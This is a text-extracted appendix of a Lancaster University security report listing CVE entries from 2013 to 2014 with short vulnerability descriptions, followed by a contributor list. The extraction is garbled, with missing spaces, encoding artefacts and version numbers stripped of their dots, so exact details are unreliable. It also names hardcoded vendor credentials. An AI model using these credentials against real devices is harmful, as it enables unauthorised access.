CVE-2013-5561The Safe Search enforcement feature inCisco Adaptive Security x000D Appliance(ASA) CX Context-Aware SecuritySoftware does not properly x000D performfiltering which allows remote attackers tobypass intended x000D policy restrictionsvia unspecified vectors aka Bug IDCSCui94622
CVE-2013-5751Directory traversal vulnerability in SAPNetWeaver 7x allows remote x000Dattackers to read arbitrary files viaunspecified vectors
CVE-2013-5757Absolute path traversal vulnerability inYealink VoIP Phone SIP-T38G allowsremote authenticated users to readarbitrary files via a full pathname in thedumpConfigFile function in the commandparameter to cgi-bincgiServerexx
CVE-2013-5828Unspecified vulnerability in the EnterpriseManager Base Platform x000D componentin Oracle Enterprise Manager Grid ControlEM Base Platform x000D 10205 and11101 EM DB Control 11107 11202and 11203 x000D and EM Pluginfor DB 12102 and 12103 allowsremote attackers to x000D affect integrityvia unknown vectors related to StorageManagement
CVE-2013-6167Mozilla Firefox through 27 sends HTTPCookie headers without first x000Dvalidating that they have the requiredcharacter-set restrictions x000D whichallows remote attackers to conduct theequivalent of a x000D persistent LogoutCSRF attack via a crafted parameterthat forces a x000D web application toset a malformed cookie within an HTTPresponse
CVE-2013-6188Cross-site request forgery (CSRF)vulnerability in HP System x000DManagement Homepage (SMH) 71through 722 allows remote attackersto x000D hijack the authentication ofunspecified victims via unknown vectors
CVE-2013-6284rdquoUnspecified vulnerability in the StatutoryReporting for Insurance x000D (FS SR)component in the Financial Servicesmodule for SAP ERP Central x000DComponent (ECC) allows attackersto execute arbitrary code via x000Dunspecified vectors related to a rdquordquocodeinjection vulnerabilityrdquordquordquo
CVE-2013-6396The OpenStack Python client libraryfor Swift (python-swiftclient) 10 x000Dthrough 190 does not verify X509certificates from SSL servers x000D whichallows man-in-the-middle attackers tospoof servers and obtain x000D sensitiveinformation via a crafted certificate
CVE-2013-6475Multiple integer overflows in (1)OPVPOutputDevcxx and (2) x000DoprsOPVPSplashcxx in the pdftoopvpfilter in CUPS and cups-filters x000Dbefore 1047 allow remote attackers toexecute arbitrary code via a x000D craftedPDF file which triggers a heap-based bufferoverflow
CVE-2013-6660The drag-and-drop implementation inGoogle Chrome before 3301750117 doesnot properly restrict the information inWebDropData data structures which allowsremote attackers to discover full pathnamesvia a crafted web site
CVE-2013-6699The Control and Provisioning of WirelessAccess Points (CAPWAP) x000D protocolimplementation on Cisco Wireless LANController (WLC) devices x000D allowsremote attackers to cause a denial of servicevia a crafted x000D CAPWAP packet thattriggers a buffer over-read aka Bug IDCSCuh81880
CVE-2013-6702The management implementation on CiscoONS 15454 controller cards with x000Dsoftware 98 and earlier allows remoteattackers to cause a denial of x000Dservice (card reset) via crafted packets akaBug ID CSCtz50902
CVE-2013-6979The VTY authentication implementation inCisco IOS XE 0302xxSE and 0303xxSEincorrectly relies on the Linux-IOS internal-network configuration which allows remoteattackers to bypass authentication byleveraging access to a 192168x2 sourceIP address aka Bug ID CSCuj90227
CVE-2013-6994OpenText Exceed OnDemand (EoD) 8transmits the session ID in x000D cleartextwhich allows remote attackers to performsession fixation x000D attacks by sniffingthe network
CVE-2013-7004D-Link DSR-150 with firmware before108B44 DSR-150N with firmware before105B64 DSR-250 and DSR-250N withfirmware before 108B44 and DSR-500 DSR-500N DSR-1000 and DSR-1000N with firmware before 108B77have a hardcoded account of usernamegkJ9232xXyruTRmY which makes it easierfor remote attackers to obtain access byleveraging knowledge of the username
CVE-2013-7043Multiple cross-site request forgery (CSRF)vulnerabilities on Cisco x000D ScientificAtlanta DPR2320R2 routers with software202r1262-090417 x000D allow remoteattackers to hijack the authentication ofadministrators x000D for requests that(1) change a password via the Passwordparameter to x000D goformRgSecurity(2) reboot the device via the Restartparameter to x000D goformrestart (3)modify Wi-Fi settings as demonstratedby the x000D WpaPreSharedKeyparameter to goformwlanSecurity or(4) modify x000D parental controls viathe ParentalPassword parameter to x000DgoformRgParentalBasic
CVE-2013-7389Multiple cross-site scripting (XSS)vulnerabilities in D-Link DIR-645 Router(Rev A1) with firmware before 104B11allow remote attackers to inject arbitraryweb script or HTML via the (1) deviceidparameter to parentalcontrolsbindphp(2) RESULT parameter to infophp or (3)receiver parameter to bsc sms sendphp
CVE-2014-0001Buffer overflow in clientmysqlcc in Oracle
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 22 of 28
MySQL and MariaDB before 5535 allowsremote database servers to cause a denialof service (crash) and possibly executearbitrary code via a long server versionstring
CVE-2014-0035The SymmetricBinding in Apache CXFbefore 2613 and 27x before 2710when EncryptBeforeSigning is enabledand the UsernameToken policy is set toan EncryptedSupportingToken transmitsthe UsernameToken in cleartext whichallows remote attackers to obtain sensitiveinformation by sniffing the network
CVE-2014-0160The (1) TLS and (2) DTLSimplementations in OpenSSL 101 before101g do not properly handle HeartbeatExtension packets which allows remoteattackers to obtain sensitive informationfrom process memory via crafted packetsthat trigger a buffer over-read asdemonstrated by reading private keysrelated to d1 bothc and t1 libc aka theHeartbleed bug
CVE-2014-0207The cdf read short sector function in cdfcin file before 519 as used in the Fileinfocomponent in PHP before 5430 and 55xbefore 5514 allows remote attackers tocause a denial of service (assertion failureand application exit) via a crafted CDF file
CVE-2014-0259rdquoMicrosoft Word 2007 SP3 and OfficeCompatibility Pack SP3 allow remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted Office document aka rdquordquoWordMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-0266rdquoThe XMLHTTP ActiveX controls in XMLCore Services 30 in Microsoft WindowsXP SP2 and SP3 Windows Server 2003SP2 Windows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RT Goldand 81 allow remote attackers to bypass theSame Origin Policy via a web page that isvisited in Internet Explorer aka rdquordquoMSXMLInformation Disclosure Vulnerabilityrdquordquordquo
CVE-2014-0294rdquoMicrosoft Forefront Protection 2010for Exchange Server does not properlyparse e-mail content which might allowremote attackers to execute arbitrarycode via a crafted message aka rdquordquoRCEVulnerabilityrdquordquordquo
CVE-2014-0313rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-0321rdquo
CVE-2014-0354The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 100(BFQ6)C0has a hardcoded password of qweasdzxcfor an unspecified account which allowsremote attackers to obtain indexasp loginaccess via an HTTP request
CVE-2014-0362Cross-site scripting (XSS) vulnerability
on Google Search Appliance (GSA)devices before 7014G216 and 72 before720G114 when dynamic navigation isconfigured allows remote attackers to injectarbitrary web script or HTML via inputincluded in a SCRIPT element
CVE-2014-0433Unspecified vulnerability in the MySQLServer component in Oracle MySQL 5613and earlier allows remote attackers to affectavailability via unknown vectors related toThread Pooling
CVE-2014-0488rdquoAPT before 109 does not rdquordquoinvalidaterepository datardquordquo when moving from anunauthenticated to authenticated statewhich allows remote attackers to haveunspecified impact via crafted repositorydatardquo
CVE-2014-0493Adobe Reader and Acrobat 10x before1019 and 11x before 11006 on Windowsand Mac OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-0495
CVE-2014-0494Adobe Digital Editions 201 allowsattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via unspecified vectors
CVE-2014-0498Stack-based buffer overflow in AdobeFlash Player before 117700269 and118x through 120x before 120070on Windows and Mac OS X and before112202341 on Linux Adobe AIR before4001628 on Android Adobe AIR SDKbefore 4001628 and Adobe AIR SDK ampCompiler before 4001628 allows attackersto execute arbitrary code via unspecifiedvectors
CVE-2014-0515Buffer overflow in Adobe Flash Playerbefore 117700279 and 118x through130x before 1300206 on Windows andOS X and before 112202356 on Linuxallows remote attackers to execute arbitrarycode via unspecified vectors as exploitedin the wild in April 2014
CVE-2014-0533Cross-site scripting (XSS) vulnerability inAdobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allows remoteattackers to inject arbitrary web script orHTML via unspecified vectors a differentvulnerability than CVE-2014-0531 and CVE-2014-0532
CVE-2014-0536Adobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allow attackersto execute arbitrary code or cause a denial ofservice (memory corruption) via unspecifiedvectors
CVE-2014-0562rdquoCross-site scripting (XSS) vulnerability in
Adobe Reader and Acrobat 10x before10112 and 11x before 11009 on OS Xallows remote attackers to inject arbitraryweb script or HTML via unspecified vectorsaka rdquordquoUniversal XSS (UXSS)rdquordquordquo
CVE-2014-0577rdquoAdobe Flash Player before 1300252and 14x and 15x before 1500223 onWindows and OS X and before 112202418on Linux Adobe AIR before 1500356Adobe AIR SDK before 1500356 andAdobe AIR SDK amp Compiler before1500356 allow attackers to executearbitrary code by leveraging an unspecifiedrdquordquotype confusionrdquordquo a different vulnerabilitythan CVE-2014-0584 CVE-2014-0585CVE-2014-0586 and CVE-2014-0590rdquo
CVE-2014-0765Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along GotoCmd argument
CVE-2014-0767Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along AccessCode argument
CVE-2014-0783Stack-based buffer overflow inBKHOdeqexe in Yokogawa CENTUMCS 3000 R30950 and earlier allows remoteattackers to execute arbitrary code via acrafted TCP packet
CVE-2014-1330WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1342WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1349Use-after-free vulnerability in Safari inApple iOS before 712 allows remoteattackers to execute arbitrary code or causea denial of service (application crash) viaan invalid URL
CVE-2014-1356Heap-based buffer overflow in launchdin Apple iOS before 712 Apple OS Xbefore 1094 and Apple TV before 612allows attackers to execute arbitrary codevia a crafted application that sends IPCmessages
CVE-2014-1370The byte-swapping implementation incopyfile in Apple OS X before 1094 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsmemory access and application crash) via acrafted AppleDouble file in a ZIP archive
CVE-2014-1379Graphics Drivers in Apple OS X before1094 allows attackers to gain privilegesor cause a denial of service (NULL pointerdereference and system crash) via a 32-bit
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 23 of 28
executable file for a crafted application
CVE-2014-1382WebKit as used in Apple iOS before712 Apple Safari before 615 and 7xbefore 705 and Apple TV before 612allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption and application crash) via acrafted web site a different vulnerabilitythan other WebKit CVEs listed in APPLE-SA-2014-06-30-1 APPLE-SA-2014-06-30-3 and APPLE-SA-2014-06-30-4
CVE-2014-1466SQL injection vulnerability in CSP MySQLUser Manager 23 allows remote attackersto execute arbitrary SQL commands via thelogin field of the login page
CVE-2014-1472Multiple cross-site scripting (XSS)vulnerabilities in the Enterprise Managerin McAfee Vulnerability Manager (MVM)755 and earlier allow remote attackers toinject arbitrary web script or HTML viaunspecified vectors
CVE-2014-1477Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before270 Firefox ESR 24x before 243Thunderbird before 243 and SeaMonkeybefore 224 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
CVE-2014-1518Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before290 Firefox ESR 24x before 245Thunderbird before 245 and SeaMonkeybefore 226 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
CVE-2014-1563Use-after-free vulnerability in themozillaDOMSVGLengthGetTearOfffunction in Mozilla Firefox before 320Firefox ESR 31x before 311 andThunderbird 31x before 311 allows remoteattackers to execute arbitrary code orcause a denial of service (heap memorycorruption) via an SVG animation withDOM interaction that triggers incorrectcycle collection
CVE-2014-1565The mozilladomAudioEventTimelinefunction in the Web Audio APIimplementation in Mozilla Firefox before320 Firefox ESR 31x before 311 andThunderbird 31x before 311 does notproperly create audio timelines whichallows remote attackers to obtain sensitiveinformation from process memory or causea denial of service (out-of-bounds read) viacrafted API calls
CVE-2014-1586contentbasesrcnsDocumentcpp inMozilla Firefox before 330 Firefox ESR31x before 312 and Thunderbird 31xbefore 312 does not consider whetherWebRTC video sharing is occurring whichallows remote attackers to obtain sensitiveinformation from the local camera in certainIFRAME situations by maintaining a sessionafter the user temporarily navigates away
CVE-2014-1701
The GenerateFunction function inbindingsscriptscode generator v8pmin Blink as used in Google Chrome before3301750149 does not implement acertain cross-origin restriction for theEventTargetdispatchEvent functionwhich allows remote attackers to conductUniversal XSS (UXSS) attacks via vectorsinvolving events
CVE-2014-1740Multiple use-after-free vulnerabilities innetwebsocketswebsocket jobcc in theWebSockets implementation in GoogleChrome before 3401847137 allow remoteattackers to cause a denial of service orpossibly have unspecified other impact viavectors related to WebSocketJob deletion
CVE-2014-1744Integer overflow in the AudioInputRendererHostOnCreateStream functionin contentbrowserrendererhostmediaaudio input renderer hostccin Google Chrome before 3501916114allows remote attackers to cause a denial ofservice or possibly have unspecified otherimpact via vectors that trigger a largeshared-memory allocation
CVE-2014-1753rdquoMicrosoft Internet Explorer 6 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-1806rdquoThe NET Remoting implementation inMicrosoft NET Framework 11 SP120 SP2 35 351 4 45 and451 does not properly restrict memoryaccess which allows remote attackers toexecute arbitrary code via vectors involvingmalformed objects aka rdquordquoTypeFilterLevelVulnerabilityrdquordquordquo
CVE-2014-1808rdquoMicrosoft Office 2013 Gold SP1 RTand RT SP1 allows remote attackers toobtain sensitive token information via aweb site that sends a crafted responseduring opening of an Office document akardquordquoToken Reuse Vulnerabilityrdquordquordquo
CVE-2014-1811rdquoThe TCP implementation in MicrosoftWindows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RTGold and 81 allows remote attackers tocause a denial of service (non-paged poolmemory consumption and system hang) viamalformed data in the Options field of aTCP header aka rdquordquoTCP Denial of ServiceVulnerabilityrdquordquordquo
CVE-2014-1812rdquoThe Group Policy implementation inMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows7 SP1 Windows 8 Windows 81 andWindows Server 2012 Gold and R2 does notproperly handle distribution of passwordswhich allows remote authenticated users toobtain sensitive credential information andconsequently gain privileges by leveragingaccess to the SYSVOL share as exploited inthe wild in May 2014 aka rdquordquoGroup PolicyPreferences Password Elevation of PrivilegeVulnerabilityrdquordquordquo
CVE-2014-2014imapsync before 1584 when running withthe ndashtls option attempts a cleartext loginwhen a certificate verification failure occurswhich allows remote attackers to obtaincredentials by sniffing the network
CVE-2014-2103Cisco Intrusion Prevention System (IPS)Software allows remote attackers to cause adenial of service (MainApp process outage)via malformed SNMP packets aka Bug IDsCSCum52355 and CSCul49309
CVE-2014-2109The TCP Input module in Cisco IOS122 through 124 and 150 through 154when NAT is used allows remote attackersto cause a denial of service (memoryconsumption or device reload) via craftedTCP packets aka Bug IDs CSCuh33843and CSCuj41494
CVE-2014-2364Multiple stack-based buffer overflows inAdvantech WebAccess before 72 allowremote attackers to execute arbitrary codevia a long string in the (1) ProjectName(2) SetParameter (3) NodeName(4) CCDParameter (5) SetColor (6)AlarmImage (7) GetParameter (8)GetColor (9) ServerResponse (10)SetBaud or (11) IPAddress parameterto an ActiveX control in (a) webvactocx(b) dvsocx or (c) webdactocx
CVE-2014-2416Unspecified vulnerability in the OracleData Integrator component in OracleFusion Middleware 111130 allows remoteattackers to affect availability via unknownvectors related to Data Quality a differentvulnerability than CVE-2014-2407 CVE-2014-2415 CVE-2014-2417 and CVE-2014-2418
CVE-2014-2554OTRS 31x before 3121 32x before3216 and 33x before 336 allows remoteattackers to conduct clickjacking attacks viaan IFRAME element
CVE-2014-2643Unspecified vulnerability in HP SystemsInsight Manager (SIM) before 74 allowsremote authenticated users to gainprivileges via unknown vectors
CVE-2014-2742rdquoIsode M-Link before 160v7 does notproperly restrict the processing ofcompressed XML elements which allowsremote attackers to cause a denial of service(resource consumption) via a crafted XMPPstream aka an rdquordquoxmppbombrdquordquo attackrdquo
CVE-2014-2768rdquoMicrosoft Internet Explorer 6 through 8allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2773rdquo
CVE-2014-2789rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2795 CVE-2014-2798 andCVE-2014-2804rdquo
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 24 of 28
CVE-2014-2791rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted web site aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-2794rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2788rdquo
CVE-2014-2808rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2796 CVE-2014-2825CVE-2014-4050 CVE-2014-4055 and CVE-2014-4067rdquo
CVE-2014-2821rdquoMicrosoft Internet Explorer 8 and 9 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-3444The GetGUID function in codecsdmp4dllin RealNetworks RealPlayer 160351 andearlier allows remote attackers to executearbitrary code or cause a denial of service(write access violation and applicationcrash) via a malformed 3gp file
CVE-2014-3489libutilmiq-passwordrb in Red HatCloudForms 30 Management Engine(CFME) before 5242 uses a hard-codedsalt which makes it easier for remoteattackers to guess passwords via a bruteforce attack
CVE-2014-3507Memory leak in d1 bothc in the DTLSimplementation in OpenSSL 098 before098zb 100 before 100n and 101before 101i allows remote attackersto cause a denial of service (memoryconsumption) via zero-length DTLSfragments that trigger improper handling ofthe return value of a certain insert function
CVE-2014-3556rdquoThe STARTTLS implementation inmailngx mail smtp handlerc in the SMTPproxy in nginx 15x and 16x before 161and 17x before 174 does not properlyrestrict IO buffering which allows man-in-the-middle attackers to insert commandsinto encrypted SMTP sessions by sending acleartext command that is processed afterTLS is in place related to a rdquordquoplaintextcommand injectionrdquordquo attack a similar issueto CVE-2011-0411rdquo
CVE-2014-3580The mod dav svn Apache HTTPD servermodule in Apache Subversion 1x before1719 and 18x before 1811 allows remoteattackers to cause a denial of service (NULLpointer dereference and server crash) via aREPORT request for a resource that doesnot exist
CVE-2014-3814
The Juniper Networks NetScreen Firewalldevices with ScreenOS before 63r17 whenconfigured to use the internal DNS lookupclient allows remote attackers to cause adenial of service (crash and reboot) viaa sequence of malformed packets to thedevice IP
CVE-2014-3819Juniper Junos 114 before 114R12 121before 121R10 121X44 before 121X44-D35 121X45 before 121X45-D25121X46 before 121X46-D20 121X47before 121X47-D10 122 before 122R8123 before 123R7 131 before 131R4132 before 132R4 133 before 133R2and 141 before 141R1 when Auto-RP isenabled allows remote attackers to causea denial of service (RDP routing processcrash and restart) via a malformed PIMpacket
CVE-2014-3872Multiple SQL injection vulnerabilities inthe administration login page in D-LinkDAP-1350 (Rev A1) with firmware114 and earlier allow remote attackers toexecute arbitrary SQL commands via the(1) username or (2) password
CVE-2014-4044OpenAFS 168 does not properly clear thefields in the host structure which allowsremote attackers to cause a denial of service(uninitialized memory access and crash)via unspecified vectors related to TMAYrequests
CVE-2014-4079rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090 CVE-2014-4094CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4082rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4100rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4105rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memory
corruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4114rdquoMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and WindowsRT Gold and 81 allow remote attackersto execute arbitrary code via a craftedOLE object in an Office document asexploited in the wild with a rdquordquoSandwormrdquordquoattack in June through October 2014 akardquordquoWindows OLE Remote Code ExecutionVulnerabilityrdquordquordquo
CVE-2014-4127rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4130rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4132 and CVE-2014-4138rdquo
CVE-2014-4132rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4130 and CVE-2014-4138rdquo
CVE-2014-4133rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4137rdquo
CVE-2014-4141rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4481Integer overflow in CoreGraphics in AppleiOS before 813 Apple OS X before10102 and Apple TV before 703 allowsremote attackers to execute arbitrary codeor cause a denial of service (applicationcrash) via a crafted PDF document
CVE-2014-4617The do uncompress function ing10compressc in GnuPG 1x before1417 and 2x before 2024 allows context-dependent attackers to cause a denialof service (infinite loop) via malformedcompressed packets as demonstrated by
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 25 of 28
an a3 01 5b ff byte sequence
CVE-2014-4631RSA Adaptive Authentication (On-Premise)6021 through 71 P3 when using devicebinding in a Challenge SOAP call orusing the RSA Adaptive AuthenticationIntegration Adapters with Out-of-BandPhone (Authentify) functionality conductspermanent device binding even whenauthentication fails which allows remoteattackers to bypass authentication
CVE-2014-5528The Appsflyer library for Android does notverify X509 certificates from SSL serverswhich allows man-in-the-middle attackersto spoof servers and obtain sensitiveinformation via a crafted certificate
CVE-2014-6040rdquoGNU C Library (aka glibc) before 220allows context-dependent attackers to causea denial of service (out-of-bounds readand crash) via a multibyte character valueof rdquordquo0xffffrdquordquo to the iconv function whenconverting (1) IBM933 (2) IBM935 (3)IBM937 (4) IBM939 or (5) IBM1364encoded data to UTF-8rdquo
CVE-2014-6105IBM Security Identity Manager 6x before6003 IF14 allows remote attackers toconduct clickjacking attacks via unspecifiedvectors
CVE-2014-6136IBM Security AppScan Standard 8x and 9xbefore 9011 FP1 supports unencryptedsessions which allows remote attackers toobtain sensitive information by sniffing thenetwork
CVE-2014-6164IBM WebSphere Application Server80x before 80010 and 85x before8554 allows remote attackers to spoofOpenID and OpenID Connect cookies andconsequently obtain sensitive informationvia a crafted URL
CVE-2014-6363rdquovbscriptdll in Microsoft VBScript 56through 58 as used with Internet Explorer6 through 11 and other products allowsremote attackers to execute arbitrarycode or cause a denial of service(memory corruption) via a crafted website aka rdquordquoVBScript Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6369rdquoMicrosoft Internet Explorer 9 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6378Juniper Junos 114 before R12-S4 121X44before D35 121X45 before D30 121X46before D25 121X47 before D10 122before R9 122X50 before D70 123 beforeR7 131 before R4 before S3 131X49before D55 131X50 before D30 132before R5 132X50 before D20 132X51before D26 and D30 132X52 before D15133 before R3 and 141 before R1 allowsremote attackers to cause a denial of service(router protocol daemon crash) via a craftedRSVP PATH message
CVE-2014-6487Unspecified vulnerability in the OracleIdentity Manager component in OracleFusion Middleware 11115 1111711121 and 11122 allows remoteauthenticated users to affect integrity viaunknown vectors related to End User SelfService
CVE-2014-7250The TCP stack in 43BSD Net2 as usedin FreeBSD 54 NetBSD possibly 20 andOpenBSD possibly 36 does not properlyimplement the session timer which allowsremote attackers to cause a denial of service(resource consumption) via crafted packets
CVE-2014-7927The SimplifiedLoweringDoLoadBufferfunction in compilersimplified-loweringccin Google V8 as used in Google Chromebefore 400221491 does not properlychoose an integer data type which allowsremote attackers to cause a denial ofservice (memory corruption) or possiblyhave unspecified other impact via craftedJavaScript code
CVE-2014-7945OpenJPEG before r2908 as used inPDFium in Google Chrome before400221491 allows remote attackersto cause a denial of service (out-of-boundsread) via a crafted PDF document relatedto j2kc jp2c and t2c
CVE-2014-8447Adobe Reader and Acrobat 10x before10113 and 11x before 11010 on Windows
and OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-8445 CVE-2014-8446 CVE-2014-8456CVE-2014-8458 CVE-2014-8459 CVE-2014-8461 and CVE-2014-9158
CVE-2014-8638The navigatorsendBeacon implementationin Mozilla Firefox before 350 FirefoxESR 31x before 314 Thunderbird before314 and SeaMonkey before 232 omitsthe CORS Origin header which allowsremote attackers to bypass intended CORSaccess-control checks and conduct cross-site request forgery (CSRF) attacks via acrafted web site
CVE-2014-8835rdquoThe xpc data get bytes function in libxpcin Apple OS X before 10102 does not verifythat a dictionaryrsquos Attributes key has thexpc data data type which allows attackersto execute arbitrary code by providing acrafted dictionary to sysmond related toan rdquordquoXPC type confusionrdquordquo issuerdquo
CVE-2014-9159Heap-based buffer overflow in AdobeReader and Acrobat 10x before 10113and 11x before 11010 on Windows andOS X allows attackers to execute arbitrarycode via unspecified vectors a differentvulnerability than CVE-2014-8457 and CVE-2014-8460
CVE-2014-9163Stack-based buffer overflow in Adobe FlashPlayer before 1300259 and 14x and 15xbefore 1500246 on Windows and OS Xand before 112202425 on Linux allowsattackers to execute arbitrary code viaunspecified vectors as exploited in the wildin December 2014
CVE-2014-9350rdquoTP-Link TL-WR740N 4 with firmware3170 Build 140520 3166 Build 130529and 3164 Build 130205 allows remoteattackers to cause a denial of service(httpd crash) via vectors involving ardquordquonewrdquordquo value in the isNew parameter toPingIframeRpmhtmrdquo
CVE-2014-9357Docker 132 allows remote attackers toexecute arbitrary code with root privilegesvia a crafted (1) image or (2) build in aDockerfile in an LZMA (xz) archive relatedto the chroot for archive extraction
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 26 of 28
Survey Responses
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 27 of 28
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 28 of 28
ContributorsDr Jose M Such (Principal Investigator)John VidlerTim SeabrookProf Awais RashidSecurity LancasterInfolab21 SCCLancaster UniversityLancasterLA1 4WAUnited Kingdom
